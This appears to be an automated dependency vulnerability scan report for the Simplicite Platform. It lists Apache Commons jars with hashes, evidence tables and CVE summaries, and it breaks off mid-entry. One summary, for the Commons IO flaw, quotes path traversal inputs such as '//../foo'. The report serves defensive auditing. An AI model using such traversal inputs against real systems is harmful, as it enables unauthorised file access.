Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution. NVD-CWE-noinfo
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N References:
Vulnerable Software & Versions: (show all )
commons-io-2.6.jarDescription:
The Apache Commons IO library contains utility classes, stream implementations, file filters,
file comparators, endian transformation classes, and much more.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar
MD5: 467c2a1f64319c99b5faf03fc78572af
SHA1: 815893df5f31da2ece4040fe0a12fd44b577afaf
SHA256: f877d304660ac2a142f3865badfc971dec7ed73c747c7f8d5d2f5139ca736513
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-io High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name io Highest Vendor Manifest automatic-module-name org.apache.commons.io Medium Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-io/ Low Vendor Manifest bundle-symbolicname org.apache.commons.io Medium Vendor Manifest implementation-url http://commons.apache.org/proper/commons-io/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id commons-io Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-io Highest Vendor pom artifactid commons-io Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email dion@apache.org Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jeremias@apache.org Low Vendor pom developer email jochen.wiedmann@gmail.com Low Vendor pom developer email krosenvold@apache.org Low Vendor pom developer email martinc@apache.org Low Vendor pom developer email matth@apache.org Low Vendor pom developer email nicolaken@apache.org Low Vendor pom developer email roxspring@apache.org Low Vendor pom developer email sanders@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id dion Medium Vendor pom developer id ggregory Medium Vendor pom developer id jeremias Medium Vendor pom developer id jochen Medium Vendor pom developer id jukka Medium Vendor pom developer id krosenvold Medium Vendor pom developer id martinc Medium Vendor pom developer id matth Medium Vendor pom developer id niallp Medium Vendor pom developer id nicolaken Medium Vendor pom developer id roxspring Medium Vendor pom developer id sanders Medium Vendor pom developer id scolebourne Medium Vendor pom developer name dIon Gillard Medium Vendor pom developer name Gary Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name Jeremias Maerki Medium Vendor pom developer name Jochen Wiedmann Medium Vendor pom developer name Jukka Zitting Medium Vendor pom developer name Kristian Rosenvold Medium Vendor pom developer name Martin Cooper Medium Vendor pom developer name Matthew Hawthorne Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Nicola Ken Barozzi Medium Vendor pom developer name Rob Oxspring Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid commons-io Highest Vendor pom name Apache Commons IO High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-io/ Highest Product file name commons-io High Product jar package name apache Highest Product jar package name commons Highest Product jar package name io Highest Product Manifest automatic-module-name org.apache.commons.io Medium Product Manifest bundle-docurl http://commons.apache.org/proper/commons-io/ Low Product Manifest Bundle-Name Apache Commons IO Medium Product Manifest bundle-symbolicname org.apache.commons.io Medium Product Manifest Implementation-Title Apache Commons IO High Product Manifest implementation-url http://commons.apache.org/proper/commons-io/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Apache Commons IO Medium Product pom artifactid commons-io Highest Product pom developer email bayard@apache.org Low Product pom developer email dion@apache.org Low Product pom developer email ggregory@apache.org Low Product pom developer email jeremias@apache.org Low Product pom developer email jochen.wiedmann@gmail.com Low Product pom developer email krosenvold@apache.org Low Product pom developer email martinc@apache.org Low Product pom developer email matth@apache.org Low Product pom developer email nicolaken@apache.org Low Product pom developer email roxspring@apache.org Low Product pom developer email sanders@apache.org Low Product pom developer id bayard Low Product pom developer id dion Low Product pom developer id ggregory Low Product pom developer id jeremias Low Product pom developer id jochen Low Product pom developer id jukka Low Product pom developer id krosenvold Low Product pom developer id martinc Low Product pom developer id matth Low Product pom developer id niallp Low Product pom developer id nicolaken Low Product pom developer id roxspring Low Product pom developer id sanders Low Product pom developer id scolebourne Low Product pom developer name dIon Gillard Low Product pom developer name Gary Gregory Low Product pom developer name Henri Yandell Low Product pom developer name Jeremias Maerki Low Product pom developer name Jochen Wiedmann Low Product pom developer name Jukka Zitting Low Product pom developer name Kristian Rosenvold Low Product pom developer name Martin Cooper Low Product pom developer name Matthew Hawthorne Low Product pom developer name Niall Pemberton Low Product pom developer name Nicola Ken Barozzi Low Product pom developer name Rob Oxspring Low Product pom developer name Scott Sanders Low Product pom developer name Stephen Colebourne Low Product pom groupid commons-io Highest Product pom name Apache Commons IO High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-io/ Medium Version file version 2.6 High Version Manifest Implementation-Version 2.6 High Version pom parent-version 2.6 Low Version pom version 2.6 Highest
CVE-2021-29425 suppress
In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value. CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVSSv2:
Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: MEDIUM (4.8) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N References:
Vulnerable Software & Versions: (show all )
commons-lang-2.6.jarDescription:
Commons Lang, a package of Java utility classes for the
classes that are in java.lang's hierarchy, or are considered to be so
standard as to justify existence in java.lang.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-lang/commons-lang/2.6/commons-lang-2.6.jar
MD5: 4d5c1693079575b362edf41500630bbd
SHA1: 0ce1edb914c94ebc388f086c6827e8bdeec71ac2
SHA256: 50f11b09f877c294d56f24463f47d28f929cf5044f648661c0f0cfbae9a2f49c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-lang High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name lang Highest Vendor Manifest bundle-docurl http://commons.apache.org/lang/ Low Vendor Manifest bundle-symbolicname org.apache.commons.lang Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-lang Highest Vendor pom artifactid commons-lang Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@seagullsw.com Low Vendor pom developer email jcarman@apache.org Low Vendor pom developer email joerg.schaible@gmx.de Low Vendor pom developer email oheger@apache.org Low Vendor pom developer email pbenedict@apache.org Low Vendor pom developer email phil@steitz.com Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email scolebourne@joda.org Low Vendor pom developer email stevencaswell@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id dlr Medium Vendor pom developer id fredrik Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id joehni Medium Vendor pom developer id mbenson Medium Vendor pom developer id niallp Medium Vendor pom developer id oheger Medium Vendor pom developer id pbenedict Medium Vendor pom developer id psteitz Medium Vendor pom developer id rdonkin Medium Vendor pom developer id scaswell Medium Vendor pom developer id scolebourne Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name Fredrik Westermarck Medium Vendor pom developer name Gary D. Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Joerg Schaible Medium Vendor pom developer name Matt Benson Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Oliver Heger Medium Vendor pom developer name Paul Benedict Medium Vendor pom developer name Phil Steitz Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Steven Caswell Medium Vendor pom developer org Carman Consulting, Inc. Medium Vendor pom developer org CollabNet, Inc. Medium Vendor pom developer org Seagull Software Medium Vendor pom developer org SITA ATS Ltd Medium Vendor pom groupid commons-lang Highest Vendor pom name Commons Lang High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/lang/ Highest Product file name commons-lang High Product jar package name apache Highest Product jar package name commons Highest Product jar package name lang Highest Product Manifest bundle-docurl http://commons.apache.org/lang/ Low Product Manifest Bundle-Name Commons Lang Medium Product Manifest bundle-symbolicname org.apache.commons.lang Medium Product Manifest Implementation-Title Commons Lang High Product Manifest specification-title Commons Lang Medium Product pom artifactid commons-lang Highest Product pom developer email bayard@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@seagullsw.com Low Product pom developer email jcarman@apache.org Low Product pom developer email joerg.schaible@gmx.de Low Product pom developer email oheger@apache.org Low Product pom developer email pbenedict@apache.org Low Product pom developer email phil@steitz.com Low Product pom developer email rdonkin@apache.org Low Product pom developer email scolebourne@joda.org Low Product pom developer email stevencaswell@apache.org Low Product pom developer id bayard Low Product pom developer id dlr Low Product pom developer id fredrik Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id joehni Low Product pom developer id mbenson Low Product pom developer id niallp Low Product pom developer id oheger Low Product pom developer id pbenedict Low Product pom developer id psteitz Low Product pom developer id rdonkin Low Product pom developer id scaswell Low Product pom developer id scolebourne Low Product pom developer name Daniel Rall Low Product pom developer name Fredrik Westermarck Low Product pom developer name Gary D. Gregory Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Joerg Schaible Low Product pom developer name Matt Benson Low Product pom developer name Niall Pemberton Low Product pom developer name Oliver Heger Low Product pom developer name Paul Benedict Low Product pom developer name Phil Steitz Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Stephen Colebourne Low Product pom developer name Steven Caswell Low Product pom developer org Carman Consulting, Inc. Low Product pom developer org CollabNet, Inc. Low Product pom developer org Seagull Software Low Product pom developer org SITA ATS Ltd Low Product pom groupid commons-lang Highest Product pom name Commons Lang High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/lang/ Medium Version file version 2.6 High Version Manifest Bundle-Version 2.6 High Version Manifest Implementation-Version 2.6 High Version pom parent-version 2.6 Low Version pom version 2.6 Highest
commons-lang3-3.9.jarDescription:
Apache Commons Lang, a package of Java utility classes for the
classes that are in java.lang's hierarchy, or are considered to be so
standard as to justify existence in java.lang.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-lang3/3.9/commons-lang3-3.9.jar
MD5: fa752c3cb5474b05e14bf2ed7e242020
SHA1: 0122c7cee69b53ed4a7681c03d4ee4c0e2765da5
SHA256: de2e1dcdcf3ef917a8ce858661a06726a9a944f28e33ad7f9e08bea44dc3c230
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-lang3 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name lang3 Highest Vendor Manifest automatic-module-name org.apache.commons.lang3 Medium Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-lang/ Low Vendor Manifest bundle-symbolicname org.apache.commons.lang3 Medium Vendor Manifest implementation-url http://commons.apache.org/proper/commons-lang/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.commons Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-lang3 Highest Vendor pom artifactid commons-lang3 Low Vendor pom developer email bayard@apache.org Low Vendor pom developer email britter@apache.org Low Vendor pom developer email chtompki@apache.org Low Vendor pom developer email djones@apache.org Low Vendor pom developer email dlr@finemaltcoding.com Low Vendor pom developer email ggregory@apache.org Low Vendor pom developer email jcarman@apache.org Low Vendor pom developer email joerg.schaible@gmx.de Low Vendor pom developer email lguibert@apache.org Low Vendor pom developer email oheger@apache.org Low Vendor pom developer email pbenedict@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email scolebourne@joda.org Low Vendor pom developer email stevencaswell@apache.org Low Vendor pom developer id bayard Medium Vendor pom developer id britter Medium Vendor pom developer id chtompki Medium Vendor pom developer id djones Medium Vendor pom developer id dlr Medium Vendor pom developer id fredrik Medium Vendor pom developer id ggregory Medium Vendor pom developer id jcarman Medium Vendor pom developer id joehni Medium Vendor pom developer id lguibert Medium Vendor pom developer id mbenson Medium Vendor pom developer id niallp Medium Vendor pom developer id oheger Medium Vendor pom developer id pbenedict Medium Vendor pom developer id rdonkin Medium Vendor pom developer id scaswell Medium Vendor pom developer id scolebourne Medium Vendor pom developer name Benedikt Ritter Medium Vendor pom developer name Daniel Rall Medium Vendor pom developer name Duncan Jones Medium Vendor pom developer name Fredrik Westermarck Medium Vendor pom developer name Gary D. Gregory Medium Vendor pom developer name Henri Yandell Medium Vendor pom developer name James Carman Medium Vendor pom developer name Joerg Schaible Medium Vendor pom developer name Loic Guibert Medium Vendor pom developer name Matt Benson Medium Vendor pom developer name Niall Pemberton Medium Vendor pom developer name Oliver Heger Medium Vendor pom developer name Paul Benedict Medium Vendor pom developer name Rob Tompkins Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom developer name Steven Caswell Medium Vendor pom developer org Carman Consulting, Inc. Medium Vendor pom developer org CollabNet, Inc. Medium Vendor pom developer org SITA ATS Ltd Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Lang High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-lang/ Highest Product file name commons-lang3 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name lang3 Highest Product Manifest automatic-module-name org.apache.commons.lang3 Medium Product Manifest bundle-docurl http://commons.apache.org/proper/commons-lang/ Low Product Manifest Bundle-Name Apache Commons Lang Medium Product Manifest bundle-symbolicname org.apache.commons.lang3 Medium Product Manifest Implementation-Title Apache Commons Lang High Product Manifest implementation-url http://commons.apache.org/proper/commons-lang/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache Commons Lang Medium Product pom artifactid commons-lang3 Highest Product pom developer email bayard@apache.org Low Product pom developer email britter@apache.org Low Product pom developer email chtompki@apache.org Low Product pom developer email djones@apache.org Low Product pom developer email dlr@finemaltcoding.com Low Product pom developer email ggregory@apache.org Low Product pom developer email jcarman@apache.org Low Product pom developer email joerg.schaible@gmx.de Low Product pom developer email lguibert@apache.org Low Product pom developer email oheger@apache.org Low Product pom developer email pbenedict@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email scolebourne@joda.org Low Product pom developer email stevencaswell@apache.org Low Product pom developer id bayard Low Product pom developer id britter Low Product pom developer id chtompki Low Product pom developer id djones Low Product pom developer id dlr Low Product pom developer id fredrik Low Product pom developer id ggregory Low Product pom developer id jcarman Low Product pom developer id joehni Low Product pom developer id lguibert Low Product pom developer id mbenson Low Product pom developer id niallp Low Product pom developer id oheger Low Product pom developer id pbenedict Low Product pom developer id rdonkin Low Product pom developer id scaswell Low Product pom developer id scolebourne Low Product pom developer name Benedikt Ritter Low Product pom developer name Daniel Rall Low Product pom developer name Duncan Jones Low Product pom developer name Fredrik Westermarck Low Product pom developer name Gary D. Gregory Low Product pom developer name Henri Yandell Low Product pom developer name James Carman Low Product pom developer name Joerg Schaible Low Product pom developer name Loic Guibert Low Product pom developer name Matt Benson Low Product pom developer name Niall Pemberton Low Product pom developer name Oliver Heger Low Product pom developer name Paul Benedict Low Product pom developer name Rob Tompkins Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Stephen Colebourne Low Product pom developer name Steven Caswell Low Product pom developer org Carman Consulting, Inc. Low Product pom developer org CollabNet, Inc. Low Product pom developer org SITA ATS Ltd Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Lang High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-lang/ Medium Version file version 3.9 High Version Manifest Implementation-Version 3.9 High Version pom parent-version 3.9 Low Version pom version 3.9 Highest
commons-logging-1.2.jarDescription:
Apache Commons Logging is a thin adapter allowing configurable bridging to other,
well known logging systems. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
MD5: 040b4b4d8eac886f6b4a2a3bd2f31b00
SHA1: 4bfc12adfe4842bf07b657f0369c4cb522955686
SHA256: daddea1ea0be0f56978ab3006b8ac92834afeefbd9b7e4e6316fca57df0fa636
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-logging High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name logging Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-logging/ Low Vendor Manifest bundle-symbolicname org.apache.commons.logging Medium Vendor Manifest implementation-build tags/LOGGING_1_2_RC2@r1608092; 2014-07-05 20:11:44+0200 Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-logging Highest Vendor pom artifactid commons-logging Low Vendor pom developer email baliuka@apache.org Low Vendor pom developer email costin@apache.org Low Vendor pom developer email craigmcc@apache.org Low Vendor pom developer email dennisl@apache.org Low Vendor pom developer email donaldp@apache.org Low Vendor pom developer email morgand@apache.org Low Vendor pom developer email rdonkin@apache.org Low Vendor pom developer email rsitze@apache.org Low Vendor pom developer email rwaldhoff@apache.org Low Vendor pom developer email sanders@apache.org Low Vendor pom developer email skitching@apache.org Low Vendor pom developer email tn@apache.org Low Vendor pom developer id baliuka Medium Vendor pom developer id bstansberry Medium Vendor pom developer id costin Medium Vendor pom developer id craigmcc Medium Vendor pom developer id dennisl Medium Vendor pom developer id donaldp Medium Vendor pom developer id morgand Medium Vendor pom developer id rdonkin Medium Vendor pom developer id rsitze Medium Vendor pom developer id rwaldhoff Medium Vendor pom developer id sanders Medium Vendor pom developer id skitching Medium Vendor pom developer id tn Medium Vendor pom developer name Brian Stansberry Medium Vendor pom developer name Costin Manolache Medium Vendor pom developer name Craig McClanahan Medium Vendor pom developer name Dennis Lundberg Medium Vendor pom developer name Juozas Baliuka Medium Vendor pom developer name Morgan Delagrange Medium Vendor pom developer name Peter Donald Medium Vendor pom developer name Richard Sitze Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Rodney Waldhoff Medium Vendor pom developer name Scott Sanders Medium Vendor pom developer name Simon Kitching Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer org Apache Medium Vendor pom developer org The Apache Software Foundation Medium Vendor pom groupid commons-logging Highest Vendor pom name Apache Commons Logging High Vendor pom parent-artifactid commons-parent Low Vendor pom parent-groupid org.apache.commons Medium Vendor pom url http://commons.apache.org/proper/commons-logging/ Highest Product file name commons-logging High Product jar package name apache Highest Product jar package name commons Highest Product jar package name logging Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-logging/ Low Product Manifest Bundle-Name Apache Commons Logging Medium Product Manifest bundle-symbolicname org.apache.commons.logging Medium Product Manifest implementation-build tags/LOGGING_1_2_RC2@r1608092; 2014-07-05 20:11:44+0200 Low Product Manifest Implementation-Title Apache Commons Logging High Product Manifest specification-title Apache Commons Logging Medium Product pom artifactid commons-logging Highest Product pom developer email baliuka@apache.org Low Product pom developer email costin@apache.org Low Product pom developer email craigmcc@apache.org Low Product pom developer email dennisl@apache.org Low Product pom developer email donaldp@apache.org Low Product pom developer email morgand@apache.org Low Product pom developer email rdonkin@apache.org Low Product pom developer email rsitze@apache.org Low Product pom developer email rwaldhoff@apache.org Low Product pom developer email sanders@apache.org Low Product pom developer email skitching@apache.org Low Product pom developer email tn@apache.org Low Product pom developer id baliuka Low Product pom developer id bstansberry Low Product pom developer id costin Low Product pom developer id craigmcc Low Product pom developer id dennisl Low Product pom developer id donaldp Low Product pom developer id morgand Low Product pom developer id rdonkin Low Product pom developer id rsitze Low Product pom developer id rwaldhoff Low Product pom developer id sanders Low Product pom developer id skitching Low Product pom developer id tn Low Product pom developer name Brian Stansberry Low Product pom developer name Costin Manolache Low Product pom developer name Craig McClanahan Low Product pom developer name Dennis Lundberg Low Product pom developer name Juozas Baliuka Low Product pom developer name Morgan Delagrange Low Product pom developer name Peter Donald Low Product pom developer name Richard Sitze Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Rodney Waldhoff Low Product pom developer name Scott Sanders Low Product pom developer name Simon Kitching Low Product pom developer name Thomas Neidhart Low Product pom developer org Apache Low Product pom developer org The Apache Software Foundation Low Product pom groupid commons-logging Highest Product pom name Apache Commons Logging High Product pom parent-artifactid commons-parent Medium Product pom parent-groupid org.apache.commons Medium Product pom url http://commons.apache.org/proper/commons-logging/ Medium Version file version 1.2 High Version Manifest Implementation-Version 1.2 High Version pom parent-version 1.2 Low Version pom version 1.2 Highest
commons-math3-3.6.1.jarDescription:
The Apache Commons Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/commons/commons-math3/3.6.1/commons-math3-3.6.1.jar
MD5: 5b730d97e4e6368069de1983937c508e
SHA1: e4ba98f1d4b3c80ec46392f25e094a6a2e58fcbf
SHA256: 1e56d7b058d28b65abd256b8458e3885b674c1d588fa43cd7d1cbb9c7ef2b308
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-math3 High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name math3 Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-math/ Low Vendor Manifest bundle-symbolicname org.apache.commons.math3 Medium Vendor Manifest implementation-build 16abfe5de688cc52fb0396e0609cb33044b15653; 2016-03-17 13:30:43-0400 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-math/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-math3 Highest Vendor pom artifactid commons-math3 Low Vendor pom developer email achou at apache dot org Low Vendor pom developer email billbarker at apache dot org Low Vendor pom developer email brentworden at apache dot org Low Vendor pom developer email celestin at apache dot org Low Vendor pom developer email dimpbx at apache dot org Low Vendor pom developer email erans at apache dot org Low Vendor pom developer email evanward at apache dot org Low Vendor pom developer email gregs at apache dot org Low Vendor pom developer email j3322ptm at yahoo dot de Low Vendor pom developer email luc at apache dot org Low Vendor pom developer email mdiggory at apache dot org Low Vendor pom developer email mikl at apache dot org Low Vendor pom developer email oertl at apache dot org Low Vendor pom developer email rdonkin at apache dot org Low Vendor pom developer email tn at apache dot org Low Vendor pom developer email tobrien at apache dot org Low Vendor pom developer id achou Medium Vendor pom developer id billbarker Medium Vendor pom developer id brentworden Medium Vendor pom developer id celestin Medium Vendor pom developer id dimpbx Medium Vendor pom developer id erans Medium Vendor pom developer id evanward Medium Vendor pom developer id gregs Medium Vendor pom developer id luc Medium Vendor pom developer id mdiggory Medium Vendor pom developer id mikl Medium Vendor pom developer id oertl Medium Vendor pom developer id pietsch Medium Vendor pom developer id rdonkin Medium Vendor pom developer id tn Medium Vendor pom developer id tobrien Medium Vendor pom developer name Albert Davidson Chou Medium Vendor pom developer name Bill Barker Medium Vendor pom developer name Brent Worden Medium Vendor pom developer name Dimitri Pourbaix Medium Vendor pom developer name Evan Ward Medium Vendor pom developer name Gilles Sadowski Medium Vendor pom developer name Greg Sterijevski Medium Vendor pom developer name J. Pietschmann Medium Vendor pom developer name Luc Maisonobe Medium Vendor pom developer name Mark Diggory Medium Vendor pom developer name Mikkel Meyer Andersen Medium Vendor pom developer name Otmar Ertl Medium Vendor pom developer name Robert Burrell Donkin Medium Vendor pom developer name Sébastien Brisard Medium Vendor pom developer name Thomas Neidhart Medium Vendor pom developer name Tim O'Brien Medium Vendor pom groupid org.apache.commons Highest Vendor pom name Apache Commons Math High Vendor pom parent-artifactid commons-parent Low Vendor pom url http://commons.apache.org/proper/commons-math/ Highest Product file name commons-math3 High Product jar package name apache Highest Product jar package name commons Highest Product jar package name filter Highest Product jar package name math3 Highest Product Manifest bundle-docurl http://commons.apache.org/proper/commons-math/ Low Product Manifest Bundle-Name Apache Commons Math Medium Product Manifest bundle-symbolicname org.apache.commons.math3 Medium Product Manifest implementation-build 16abfe5de688cc52fb0396e0609cb33044b15653; 2016-03-17 13:30:43-0400 Low Product Manifest Implementation-Title Apache Commons Math High Product Manifest implementation-url http://commons.apache.org/proper/commons-math/ Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.5))" Low Product Manifest specification-title Apache Commons Math Medium Product pom artifactid commons-math3 Highest Product pom developer email achou at apache dot org Low Product pom developer email billbarker at apache dot org Low Product pom developer email brentworden at apache dot org Low Product pom developer email celestin at apache dot org Low Product pom developer email dimpbx at apache dot org Low Product pom developer email erans at apache dot org Low Product pom developer email evanward at apache dot org Low Product pom developer email gregs at apache dot org Low Product pom developer email j3322ptm at yahoo dot de Low Product pom developer email luc at apache dot org Low Product pom developer email mdiggory at apache dot org Low Product pom developer email mikl at apache dot org Low Product pom developer email oertl at apache dot org Low Product pom developer email rdonkin at apache dot org Low Product pom developer email tn at apache dot org Low Product pom developer email tobrien at apache dot org Low Product pom developer id achou Low Product pom developer id billbarker Low Product pom developer id brentworden Low Product pom developer id celestin Low Product pom developer id dimpbx Low Product pom developer id erans Low Product pom developer id evanward Low Product pom developer id gregs Low Product pom developer id luc Low Product pom developer id mdiggory Low Product pom developer id mikl Low Product pom developer id oertl Low Product pom developer id pietsch Low Product pom developer id rdonkin Low Product pom developer id tn Low Product pom developer id tobrien Low Product pom developer name Albert Davidson Chou Low Product pom developer name Bill Barker Low Product pom developer name Brent Worden Low Product pom developer name Dimitri Pourbaix Low Product pom developer name Evan Ward Low Product pom developer name Gilles Sadowski Low Product pom developer name Greg Sterijevski Low Product pom developer name J. Pietschmann Low Product pom developer name Luc Maisonobe Low Product pom developer name Mark Diggory Low Product pom developer name Mikkel Meyer Andersen Low Product pom developer name Otmar Ertl Low Product pom developer name Robert Burrell Donkin Low Product pom developer name Sébastien Brisard Low Product pom developer name Thomas Neidhart Low Product pom developer name Tim O'Brien Low Product pom groupid org.apache.commons Highest Product pom name Apache Commons Math High Product pom parent-artifactid commons-parent Medium Product pom url http://commons.apache.org/proper/commons-math/ Medium Version file version 3.6.1 High Version Manifest Bundle-Version 3.6.1 High Version Manifest Implementation-Version 3.6.1 High Version pom parent-version 3.6.1 Low Version pom version 3.6.1 Highest
commons-net-3.6.jarDescription:
Apache Commons Net library contains a collection of network utilities and protocol implementations.
Supported protocols include: Echo, Finger, FTP, NNTP, NTP, POP3(S), SMTP(S), Telnet, Whois
License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/commons-net/commons-net/3.6/commons-net-3.6.jar
MD5: b46661b01cc7aeec501f1cd3775509f1
SHA1: b71de00508dcb078d2b24b5fa7e538636de9b3da
SHA256: d3b3866c61a47ba3bf040ab98e60c3010d027da0e7a99e1755e407dd47bc2702
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name commons-net High Vendor jar package name apache Highest Vendor jar package name commons Highest Vendor jar package name echo Highest Vendor jar package name finger Highest Vendor jar package name ftp Highest Vendor jar package name net Highest Vendor jar package name nntp Highest Vendor jar package name pop3 Highest Vendor jar package name smtp Highest Vendor jar package name telnet Highest Vendor jar package name whois Highest Vendor Manifest bundle-docurl http://commons.apache.org/proper/commons-net/ Low Vendor Manifest bundle-symbolicname org.apache.commons.net Medium Vendor Manifest implementation-build tags/NET_3_6_RC1@r1782607; 2017-02-11 15:16:26+0000 Low Vendor Manifest implementation-url http://commons.apache.org/proper/commons-net/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid commons-net Highest Vendor pom artifactid commons-net Low Vendor pom developer email bruno.davanzo@hp.com Low Vendor pom developer email dfs@apache.org Low Vendor pom developer email Jeff.Brekke@qg.com Low Vendor pom developer email rwinston@apache.org Low Vendor pom developer email rwinston@checkfree.com Low Vendor pom developer email scohen@apache.org Low Vendor pom developer id brekke Medium Vendor pom developer id brudav Medium Vendor pom developer id dfs Medium Vendor pom developer id rwinston Medium Vendor pom developer id scohen Medium Vendor pom developer name Bruno D'Avanzo Medium Vendor pom developer name Daniel F. Savarese Medium Vendor pom developer name Jeffrey D. Brekke Medium Vendor pom developer name 